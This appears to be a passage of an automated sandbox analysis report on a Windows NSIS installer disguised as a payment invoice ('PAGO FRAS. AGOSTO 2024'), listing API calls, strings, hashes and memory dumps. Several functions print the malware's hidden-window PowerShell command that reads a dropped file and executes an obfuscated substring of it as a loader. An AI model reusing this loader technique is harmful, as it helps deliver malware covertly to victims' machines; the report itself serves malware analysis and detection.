Instruction Fuzzy Hash: 0D51CF30800A44AADF21AB258C85BBF7AB8DF92754F54447BF404761D2D73C8982EE6E

Function 00406033 Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNELBASE(74DF3410,0042B0B8,0042AC70,004058D2,0042AC70,0042AC70,00000000,0042AC70,0042AC70,74DF3410,?,C:\Users\user\AppData\Local\Temp\,004055F1,?,74DF3410,C:\Users\user\AppData\Local\Temp\), ref: 0040603E
FindClose.KERNEL32(00000000), ref: 0040604A

Memory Dump Source

Source File: 00000000.00000002.1695394960.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1695381081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695410954.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PAGO FRAS.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 1a0439c71b90d7762d613f3ef5096b6a49eabdc5bf1978f8ceae5763bb33e6b2
Instruction ID: 8bfbb141000912a81af5c8de5ce039a851029b32224eb031c3a4159cf0b452c4
Opcode Fuzzy Hash: 1a0439c71b90d7762d613f3ef5096b6a49eabdc5bf1978f8ceae5763bb33e6b2
Instruction Fuzzy Hash: 11D0123195D1205BC31167387D0C88B7B599B163317518A33B56AF12F0C7349C6686EE

Function 00403A41 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403A7D
ShowWindow.USER32(?), ref: 00403A9A
DestroyWindow.USER32 ref: 00403AAE
SetWindowLongA.USER32(?,00000000,00000000), ref: 00403ACA
GetDlgItem.USER32(?,?), ref: 00403AEB
SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403AFF
IsWindowEnabled.USER32(00000000), ref: 00403B06
GetDlgItem.USER32(?,00000001), ref: 00403BB4
GetDlgItem.USER32(?,00000002), ref: 00403BBE
SetClassLongA.USER32(?,000000F2,?), ref: 00403BD8
SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403C29
GetDlgItem.USER32(?,00000003), ref: 00403CCF
ShowWindow.USER32(00000000,?), ref: 00403CF0
KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403D02
EnableWindow.USER32(?,?), ref: 00403D1D
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403D33
EnableMenuItem.USER32(00000000), ref: 00403D3A
SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403D52
SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403D65
lstrlenA.KERNEL32(00429868,?,00429868,Blaggard Setup), ref: 00403D8E
SetWindowTextA.USER32(?,00429868), ref: 00403D9D
ShowWindow.USER32(?,0000000A), ref: 00403ED1

Strings

Blaggard Setup, xrefs: 00403D7F

Memory Dump Source

Source File: 00000000.00000002.1695394960.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1695381081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695410954.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PAGO FRAS.jbxd

Similarity

API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
String ID: Blaggard Setup
API String ID: 3282139019-3821040904
Opcode ID: fc27e82e98cabd3308fd2f89a2a423f79f43cd40c567b8a18826c7a47723085f
Instruction ID: 4996b7fab7fdeaebc033b1676f4cae353b3174fabf4a12f0715eb1af02f584c4
Opcode Fuzzy Hash: fc27e82e98cabd3308fd2f89a2a423f79f43cd40c567b8a18826c7a47723085f
Instruction Fuzzy Hash: 74C1B131A04205ABDB216F62ED85E2B7EBCFB4570AF40053EF501B11E1C739A942DB6E

Function 004036AF Relevance: 45.7, APIs: 13, Strings: 13, Instructions: 215
stringregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004060C8: GetModuleHandleA.KERNEL32(?,?,?,00403179,00000009), ref: 004060DA
Part of subcall function 004060C8: GetProcAddress.KERNEL32(00000000,?), ref: 004060F5

lstrcatA.KERNEL32(1033,00429868,80000001,Control Panel\Desktop\ResourceLocale,00000000,00429868,00000000,00000002,74DF3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exe",00000000), ref: 0040372A
lstrlenA.KERNEL32(Space required: ,?,?,?,Space required: ,00000000,C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian,1033,00429868,80000001,Control Panel\Desktop\ResourceLocale,00000000,00429868,00000000,00000002,74DF3410), ref: 0040379F
lstrcmpiA.KERNEL32(?,.exe), ref: 004037B2
GetFileAttributesA.KERNEL32(Space required: ), ref: 004037BD
LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian), ref: 00403806

Part of subcall function 00405C8D: wsprintfA.USER32 ref: 00405C9A

RegisterClassA.USER32(0042DBA0), ref: 00403843
SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 0040385B
CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403890
ShowWindow.USER32(00000005,00000000), ref: 004038C6
GetClassInfoA.USER32(00000000,RichEdit20A,0042DBA0), ref: 004038F2
GetClassInfoA.USER32(00000000,RichEdit,0042DBA0), ref: 004038FF
RegisterClassA.USER32(0042DBA0), ref: 00403908
DialogBoxParamA.USER32(?,00000000,00403A41,00000000), ref: 00403927

Strings

RichEd20, xrefs: 004038CC
C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian, xrefs: 00403739, 00403741, 004037D9, 004037DF, 004037EF
RichEdit20A, xrefs: 004038EA, 004038F0
RichEd32, xrefs: 004038DA
"C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exe", xrefs: 004036B3
C:\Users\user\AppData\Local\Temp\, xrefs: 004036B4
.exe, xrefs: 004037AC
Control Panel\Desktop\ResourceLocale, xrefs: 004036E3
Space required: , xrefs: 0040376D, 00403775, 00403782, 004037CC, 004037D2
1033, xrefs: 004036CF, 00403725
.DEFAULT\Control Panel\International, xrefs: 00403715
RichEdit, xrefs: 004038F9
_Nb, xrefs: 00403822, 0040388A

Memory Dump Source

Source File: 00000000.00000002.1695394960.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1695381081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695410954.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PAGO FRAS.jbxd

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: "C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$Space required: $_Nb
API String ID: 1975747703-306026215
Opcode ID: 394e4bb129311e5b6d6d20aedec098417f6b3d3145e2df1ac527dc8f8ff082cb
Instruction ID: 60e5f6254d87716c4f77e59e0de616dae33e132719ef70849b8472436850552a
Opcode Fuzzy Hash: 394e4bb129311e5b6d6d20aedec098417f6b3d3145e2df1ac527dc8f8ff082cb
Instruction Fuzzy Hash: 4161E6B07442006EE620BF269C85F373EACEB45749F50443FF945B62E2C67CAD429A2D

Function 00402C66 Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 182
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00402C77
GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exe,00000400), ref: 00402C93

Part of subcall function 004059A2: GetFileAttributesA.KERNELBASE(00000003,00402CA6,C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exe,80000000,00000003), ref: 004059A6
Part of subcall function 004059A2: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004059C8

GetFileSize.KERNEL32(00000000,00000000,00436000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exe,C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exe,80000000,00000003), ref: 00402CDF

Strings

Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402E3E
Null, xrefs: 00402D5D
Error launching installer, xrefs: 00402CB6
"C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exe", xrefs: 00402C66
C:\Users\user\AppData\Local\Temp\, xrefs: 00402C6D
C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exe, xrefs: 00402C7D, 00402C8C, 00402CA0, 00402CC0
soft, xrefs: 00402D54
C:\Users\user\Desktop, xrefs: 00402CC1, 00402CC6, 00402CCC
Inst, xrefs: 00402D4B

Memory Dump Source

Source File: 00000000.00000002.1695394960.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1695381081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695410954.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PAGO FRAS.jbxd

Similarity

API ID: File$AttributesCountCreateModuleNameSizeTick
String ID: "C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
API String ID: 4283519449-3845263885
Opcode ID: 5f7c5d9e77a9b9c73338c6d1e92cd20f3f30bb0dbb8c708eeee72798782a561c
Instruction ID: 2dd8a40a4a6da4a25a7ff80ffc2ca296f3ca1cc65932c4217ff60142993c7b59
Opcode Fuzzy Hash: 5f7c5d9e77a9b9c73338c6d1e92cd20f3f30bb0dbb8c708eeee72798782a561c
Instruction Fuzzy Hash: 9651F771940214ABDF20AF65DE89B9E7AA8EF04714F54803BF504B72D2C7BC9D418BAD

Function 00401751 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 147
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrcatA.KERNEL32(00000000,00000000,"powershell.exe" -windowstyle hidden "$Laseredes=Get-Content -raw 'C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Vandrerlav.syn';$Overrislingerne=$Laseredes.SubString(15504,3);.$Overrislingerne($Laseredes)",C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Svarbrevets,00000000,00000000,00000031), ref: 00401790
CompareFileTime.KERNEL32(-00000014,?,"powershell.exe" -windowstyle hidden "$Laseredes=Get-Content -raw 'C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Vandrerlav.syn';$Overrislingerne=$Laseredes.SubString(15504,3);.$Overrislingerne($Laseredes)","powershell.exe" -windowstyle hidden "$Laseredes=Get-Content -raw 'C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Vandrerlav.syn';$Overrislingerne=$Laseredes.SubString(15504,3);.$Overrislingerne($Laseredes)",00000000,00000000,"powershell.exe" -windowstyle hidden "$Laseredes=Get-Content -raw 'C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Vandrerlav.syn';$Overrislingerne=$Laseredes.SubString(15504,3);.$Overrislingerne($Laseredes)",C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Svarbrevets,00000000,00000000,00000031), ref: 004017BA

Part of subcall function 00405D2F: lstrcpynA.KERNEL32(?,?,00000400,004031BD,Blaggard Setup,NSIS Error), ref: 00405D3C

Part of subcall function 00404F48: lstrlenA.KERNEL32(00429048,00000000,0041C205,74DF23A0,?,?,?,?,?,?,?,?,?,00402FFA,00000000,?), ref: 00404F81
Part of subcall function 00404F48: lstrlenA.KERNEL32(00402FFA,00429048,00000000,0041C205,74DF23A0,?,?,?,?,?,?,?,?,?,00402FFA,00000000), ref: 00404F91
Part of subcall function 00404F48: lstrcatA.KERNEL32(00429048,00402FFA,00402FFA,00429048,00000000,0041C205,74DF23A0), ref: 00404FA4
Part of subcall function 00404F48: SetWindowTextA.USER32(00429048,00429048), ref: 00404FB6
Part of subcall function 00404F48: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404FDC
Part of subcall function 00404F48: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FF6
Part of subcall function 00404F48: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405004

Strings

C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Svarbrevets, xrefs: 0040177E
"powershell.exe" -windowstyle hidden "$Laseredes=Get-Content -raw 'C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Vandrerlav.syn';$Overrislingerne=$Laseredes.SubString(15504,3);.$Overrislingerne($Laseredes)", xrefs: 0040176D, 00401776, 00401783, 00401795, 004017A6, 004017DC, 004017F2, 00401810, 00401850, 004018D1, 004018DA, 004018E4, 004018EF
Arabisation\argumenta\dekaderne, xrefs: 0040179B, 0040180A, 00401828
C:\Users\user\AppData\Local\Temp\Vedlgges.Fam, xrefs: 0040181E, 0040183A

Memory Dump Source

Source File: 00000000.00000002.1695394960.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1695381081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695410954.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PAGO FRAS.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID: "powershell.exe" -windowstyle hidden "$Laseredes=Get-Content -raw 'C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Vandrerlav.syn';$Overrislingerne=$Laseredes.SubString(15504,3);.$Overrislingerne($Laseredes)"$Arabisation\argumenta\dekaderne$C:\Users\user\AppData\Local\Temp\Vedlgges.Fam$C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Svarbrevets
API String ID: 1941528284-1744067590
Opcode ID: 4f9644c0113f451ee2cb14cf97c87bd5b67e16b7d88c3abb121216c9f25fe8f5
Instruction ID: 9fffb686f64fba45267de9fcbed8a5438fb589d34f2a074259106400a528bed4
Opcode Fuzzy Hash: 4f9644c0113f451ee2cb14cf97c87bd5b67e16b7d88c3abb121216c9f25fe8f5
Instruction Fuzzy Hash: 1041B831900519BBDF107BA5DC85EAF3679DF45368B60863BF121F11E1D63C8A418A6D

Function 00402E9F Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 166
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00402F06
GetTickCount.KERNEL32 ref: 00402FAD
MulDiv.KERNEL32(7FFFFFFF,00000064,00000020), ref: 00402FD6
wsprintfA.USER32 ref: 00402FE6

Strings

DA, xrefs: 00403060
DwA, xrefs: 00402F73, 00402F85
DA, xrefs: 00402F5C
... %d%%, xrefs: 00402FE0

Memory Dump Source

Source File: 00000000.00000002.1695394960.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1695381081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695410954.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PAGO FRAS.jbxd

Similarity

API ID: CountTick$wsprintf
String ID: DA$ DA$... %d%%$DwA
API String ID: 551687249-506594815
Opcode ID: 3c1c6048edc1f00d8c5e0ea3695652e11966b85d101879319fc20926b17e4e8a
Instruction ID: 91ee06cea14faca46f7a5a314d1b96781db6e884ff6161e1c143c8ea96f9570f
Opcode Fuzzy Hash: 3c1c6048edc1f00d8c5e0ea3695652e11966b85d101879319fc20926b17e4e8a
Instruction Fuzzy Hash: FB51907190120A9BDB10DF65EA44B9F7BB8EF44756F10813BE800B72C4D7788E51DBAA

Function 0040540E Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 39
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405451
GetLastError.KERNEL32 ref: 00405465
SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 0040547A
GetLastError.KERNEL32 ref: 00405484

Strings

ds@, xrefs: 00405443
C:\Users\user\AppData\Local\Temp\, xrefs: 00405434
C:\Users\user\Desktop, xrefs: 0040540E
ts@, xrefs: 00405414

Memory Dump Source

Source File: 00000000.00000002.1695394960.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1695381081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695410954.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PAGO FRAS.jbxd

Similarity

API ID: ErrorLast$CreateDirectoryFileSecurity
String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$ds@$ts@
API String ID: 3449924974-3946084282
Opcode ID: f69d3160a82a2859f106a017fa20b71bd819ec85ae22b078452fa26fbc967781
Instruction ID: 7d6f839e8d8492d35463ff02b487d6c5a8d89e3dbffb35ab490880a12e6152a5
Opcode Fuzzy Hash: f69d3160a82a2859f106a017fa20b71bd819ec85ae22b078452fa26fbc967781
Instruction Fuzzy Hash: B4010871D14259EADF11DBA0C9447EFBFB8EB14355F004176E905B6280E378A644CFAA

Function 0040605A Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00406071
wsprintfA.USER32 ref: 004060AA
LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004060BE

Strings

\, xrefs: 00406082
UXTHEME, xrefs: 00406063
%s%s.dll, xrefs: 004060A4

Memory Dump Source

Source File: 00000000.00000002.1695394960.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1695381081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695410954.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PAGO FRAS.jbxd

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%s.dll$UXTHEME$\
API String ID: 2200240437-4240819195
Opcode ID: 38f932dad6d10820f3564912fa7e39c047c8ada2afd73a6a353afcde48b08f1a
Instruction ID: e3f146f71c0a6e9640e358317deb724d3a5625ccb5f8d81b259ee964bec3998a
Opcode Fuzzy Hash: 38f932dad6d10820f3564912fa7e39c047c8ada2afd73a6a353afcde48b08f1a
Instruction Fuzzy Hash: D0F0FC3095010566DB14DB74DD0DFEB375CAB08305F14017AA647E11D1D974F9248B69

Function 00402364 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71
registrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegCreateKeyExA.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023A2
lstrlenA.KERNEL32(Arabisation\argumenta\dekaderne,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004023C2
RegSetValueExA.ADVAPI32(?,?,?,?,Arabisation\argumenta\dekaderne,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023FB
RegCloseKey.ADVAPI32(?,?,?,Arabisation\argumenta\dekaderne,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024D8

Strings

Arabisation\argumenta\dekaderne, xrefs: 004023B3, 004023D5, 004023E5, 004023F0

Memory Dump Source

Source File: 00000000.00000002.1695394960.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1695381081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695410954.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PAGO FRAS.jbxd

Similarity

API ID: CloseCreateValuelstrlen
String ID: Arabisation\argumenta\dekaderne
API String ID: 1356686001-2217045471
Opcode ID: af2b45bfcb0136edb290ca19ee121481d5b6a55bc37b0262ae4d3dbc08afb77b
Instruction ID: f509f4240a3e10e7eaa3df5a693eb391f4e90e3bb863c7dbc5285fb3648b227d
Opcode Fuzzy Hash: af2b45bfcb0136edb290ca19ee121481d5b6a55bc37b0262ae4d3dbc08afb77b
Instruction Fuzzy Hash: 6B117571E00108BFEB10EBA5DE89EAF767DEB54358F10403AF605B71D1D6B85D419B28

Function 004059D1 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 004059E5
GetTempFileNameA.KERNELBASE(?,?,00000000,?), ref: 004059FF

Strings

"C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exe", xrefs: 004059D1
C:\Users\user\AppData\Local\Temp\, xrefs: 004059D4
nsa, xrefs: 004059DC

Memory Dump Source

